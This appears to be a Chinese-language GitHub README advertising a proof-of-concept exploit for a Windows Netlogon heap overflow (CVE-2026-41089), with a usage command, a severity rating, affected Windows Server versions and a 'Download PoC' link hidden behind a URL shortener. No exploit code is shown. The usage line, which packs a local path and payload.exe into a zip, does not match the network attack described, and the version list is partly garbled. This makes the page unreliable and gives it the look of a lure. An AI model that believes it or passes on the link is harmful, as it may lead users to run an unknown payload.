sananpa/CVE-2026-41089

# CVE-2026-41089 - 安全缓冲区溢出 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用注意事项 - **严重性:** CRITICAL - **CVSS:** 9.8 - **影响:** 机密性、完整性、可用性 - **发布日期:** 2026-05-12 ## 技术摘要 Windows Netlogon 中的基于堆的缓冲区溢出允许未经授权的攻击者在网络上执行代码。 ## 受影响版本 **Microsoft Windows Server 2012:** - - - r2 **Microsoft Windows Server 2016:** - 10.0.14393.9140 之前 **Microsoft Windows Server 2019:** - 10.0.17763.8755 之前 **Microsoft Windows Server 2022:** - 10.0.20348.5074 之前 **Microsoft Windows Server 2022 23H2:** - 10.0.25398.2330 之前 **Microsoft Windows Server 2025:** - 10.0.26100.32772 之前 ## 参考资料 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41089 ## 漏洞利用 [下载 PoC](https://tinyurl.com/2ysfff63)

标签：威胁模拟, 逆向工具